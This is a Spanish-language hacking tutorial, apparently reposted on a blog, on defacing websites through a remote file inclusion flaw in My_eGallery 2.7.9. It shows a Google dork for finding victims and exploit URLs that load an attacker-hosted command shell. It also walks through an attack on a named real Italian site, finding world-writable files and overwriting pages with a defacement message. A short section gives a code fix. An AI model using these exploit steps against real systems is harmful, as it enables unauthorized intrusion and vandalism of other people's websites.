[ 1 ] .- Introduccion.............................................. Status-x
[ 2 ] .- Que es My_eGallery........................................ Status-x
[ 3 ] .- Buscando Victimas......................................... Status-x
[ 4 ] .- Explorando el Bug......................................... Status-x
[ 5 ] .- Tips De Deface............................................ Status-x
[ 6 ] .- Arreglando el Bug......................................... Status-x
[ 6 ] .- Herramientas.............................................. Status-x
[ 7 ] .- Despedida................................................. Status-x
****************************************************************************
############################################################################
sh-2.05b$ ./ Introduccion
############################################################################
Saludos a toda la Scene Mexicana y de todo el mundo, bueno pues me he decidi
do a empezar a hacer mis propios tutoriales de Deface para todos ustedes
esta vez comenzare con un tutorial sencillo, sin embargo proximamente pondre
mas y mejores tutoriales solo que necesito ver la respuesta de todos ustedes
comenzemos pues con este tutorial que espero les sirva de algo ;), este tuto
va enfocado a personas que tienen conocimientos sobre comandos linux ;) y
que tengan nociones de hacking o defacing
############################################################################
sh-2.05b$ ./ Que es My_eGallery
############################################################################
My_eGallery es un sistema desarrollado originalmente para PostNuke con
algunas caracteristicas especiales como:
- Soporte de Imagenes
- Soporte de Archivos de Audio y Video
- Organizacion por Categorias y Subcategorias
El lenguaje original en que fue creado es Ingles y Aleman, es un sistema GNU
y esta programado en PHP.
El Sistema puede ser descargado en:
http://noc.postnuke.com/project/showfiles.php?group_id=155&release_id=317
La version AFECTADA es la 2.7.9 - sin embargo el autor menciona que es posi
ble que otras versiones tambien lo sean ;)
############################################################################
sh-2.05b$ ./ Buscando Victimas
############################################################################
La parte mas tediosa de todo esto jejeje, bien para esto usaremos el fiel
Google: http://www.google.com.mx
En nuestro criterio de busqueda usaremos una funcion de Google que nos sirve
para encontrar archivos o URLS especificos:
allinurl: modules.php?name=My_eGallery
Con los cual nos quedaria de resultado una URL como esta en la cual aparece
ran todas las webs que contengan esa url ;)
-------------------------------------------------------------------------
http://www.google.com.mx/search?hl=es&q=allinurl%3A+modules.php%3Fname%3D
My_eGallery&meta=
-------------------------------------------------------------------------
Y listo ya tenemos una amplia lista de sitios los cuales explorar ;)
############################################################################
sh-2.05b$ ./ Explorando el Bug
############################################################################
Bien el fallo radica en My_eGallery 2.7.9 en las siguientes lineas del
codigo:
--------------------------------------------------
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
--------------------------------------------------
Con lo que podremos incluir archivos y ejecutar comandos *NIX de la siguiente
manera:
-----------------------------------------------------------------------------
http://victima.com/modules/My_eGallery/public/
displayCategory.php?basepath=http://atacante/cmd.gif?&cmd= AQUI COMANDO LINUX
-----------------------------------------------------------------------------
Bien pongamos un ejemplo real:
-------------------------------------------------------------------
http://www.cznet.it/modules/My_eGallery/public/displayCategory.php?
basepath=http://mx.geocities.com/razorkron/cmd.txt?&cmd=ls
-------------------------------------------------------------------
en donde ls es nuestro comando Linux y sirve para:
ls - enlista los archivos y directorios existentes
Y como vemos nos muestra la lista de archivos:
---------------------
displayCategory.php
displayMedia.php
displayMedia.php.old
displayTop.php
functions.php
imageFunctions.php
index.html
mainGallery.php
nmimage.php
uploadFile.php
---------------------
Tambien nos muestra datos del servidor Version de Kernel, user id, directorio
actual e informacion extra del servidor como version de Apache, etc.
En caso de que nuestro id de usuario sea:
----------------------------------
uid(99) euid(99) gid(99) - Nobody
----------------------------------
Quiere decir que no tenemos permisos:
--------------------------
Permissão de Escrita: Não
--------------------------
y que se nos dificultara poder realizar nuestro deface sin embargo en dado
caso de que tuvieramos permisos para poder escribir archivos:
--------------------------
Permissão de Escrita: SIM
--------------------------
El comando a utilizar seria el siguiente:
---------------------------------------------------------------
cd /usr/www/htdocs/cznet.it/;echo Status-x Ownz You >index.html
---------------------------------------------------------------
Con lo cual nuestro deface se veria en la pagina principal, bien sin
embargo ya he mencionado que eso solo ocurriria si tuvieramos permisos de
escritura pero como no los tenemos pasemos a la siguiente etapa, Tips de
Deface, los cuales les ayudaran bastante en estos casos.
############################################################################
sh-2.05b$ ./ Tips de Deface
############################################################################
*/ Deface en Subdirectorios o Archivos con Permisos 777
Bien dado que no tenemos permisos de escritura en esa web no le podremos
hacer el deface en la pagina principal sin embargo podemos hacerle el deface
en alguno de los subdirectorios o en algun archivo con permisos de escritura
esto lo haremos de la siguiente manera:
- Nos situamos en el directorio donde estan los modulos del PHP Nuke de la
web y enlistamos los archivos:
--------------------------------------
cd /usr/www/htdocs/cznet.it/modules;ls
--------------------------------------
Entonces empezaremos buscando archivos con permisos de escritura, esto lo
haremos con el siguiente comando:
--------------------------------------------------
cd /usr/www/htdocs/cznet.it/modules;find -perm 777
--------------------------------------------------
Y nos saldra de resultado:
---------------------------------------------------
./Cruscotti/index.php
./My_eGallery
./My_eGallery/gallery
./My_eGallery/gallery/Praga
./My_eGallery/gallery/Praga/Castello_temporale1.jpg
./My_eGallery/gallery/Praga/Praga.gif
./My_eGallery/gallery/Praga/mulino.jpg
./My_eGallery/gallery/Praga/mulino.zip
./My_eGallery/gallery/Praga/rano.jpg
./My_eGallery/gallery/Praga/thumb
./My_eGallery/gallery/Mikulasska
./My_eGallery/gallery/Mikulasska/0000auguri.jpg
./My_eGallery/gallery/Mikulasska/0001-13.jpg
./My_eGallery/gallery/Mikulasska/0001-e.jpg
./My_eGallery/gallery/Mikulasska/0002-28.jpg
./My_eGallery/gallery/Mikulasska/0003-18.jpg
./My_eGallery/gallery/Mikulasska/0003-2.jpg
./My_eGallery/gallery/Mikulasska/0003-30.jpg
./My_eGallery/gallery/Mikulasska/0003-9.jpg
./My_eGallery/gallery/Mikulasska/mikulasska.jpg
./My_eGallery/gallery/Mikulasska/thumb
./My_eGallery/gallery/temp
./My_eGallery/gallery/konupek
./My_eGallery/gallery/konupek/gallery.gif
./My_eGallery/gallery/konupek/thumb
./My_eGallery/gallery/Pisek
./My_eGallery/gallery/Pisek/gallery.gif
./My_eGallery/gallery/Pisek/thumb
./My_eGallery/temp
./My_eGallery/random/bindvv
find: ./WebMail: Permission denied
./World_Weather/cache
./Contact/language/lang-italian.php
./Contact/language/lang-czech.php
./Contact/language/lang-english.php
./Contact/index.php
-----------------------------------------------------
Y esos son los archivos a los que les podemos hacer el deface, ahora bien el
siguiente paso es hacer el deface para esto elegire el directorio y archivo:
----------------------
/Contact/index.php
----------------------
Entonces nos situamos en el directorio y enlistamos los archivos:
-----------------------------------------------
cd /usr/www/htdocs/cznet.it/modules/Contact/;ls
-----------------------------------------------
Y Bien procedemos a hacer nuestro deface:
--------------------------------------------------------------------------
cd /usr/www/htdocs/cznet.it/modules/Contact/;echo Status-x Here >index.php
--------------------------------------------------------------------------
Y listo nuestro deface ha sido realizado:
---------------------------------------------
http://www.cznet.it/modules/Contact/index.php
---------------------------------------------
Bien ese ha sido un pequeño tip ;) de parte de Status-x asi que ahora proce
demos a la parte White Hat - Arreglando el Bug o ayudando al Webmaster.
############################################################################
sh-2.05b$ ./ Arreglando el Bug
############################################################################
Es estupido dejar tu mail al admin para supuestamente ayudarlo y al final
no ayudarlo en absolutamente nada, sino simplemente contestandole:
Im a 1337 hax0r, y0u suck admin
Asi que mejor le echaremos una manita y le ayudaremos a arreglar el Bug.
Como ya habiamos dicho el Bug se encuentra en el archivo displayCategory.php
en las siguientes lineas,
------------------------------------------
("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
------------------------------------------
Las cuales debemos sustituir por las siguientes:
----------------------------------------------------------
include ("modules/My_eGallery/public/imageFunctions.php");
include ("admin/modules/gallery/fileFunctions.php");
----------------------------------------------------------
Y listo nuestra vulnerabilidad esta arreglada.
############################################################################
sh-2.05b$ ./ Herramientas
############################################################################
Las herramientas utilizadas fueron las siguientes:
Ejecutor de Comandos Linux - http://mx.geocities.com/razorkron/cmd.txt
Realizado por Infektion Group de Brasil - Contacto: infektion@linuxmail.org
Buscador Google - http://www.google.com
editado por 3rr0r
-deyvid94@hotmail.com-
Cap comentari:
Publica un comentari a l'entrada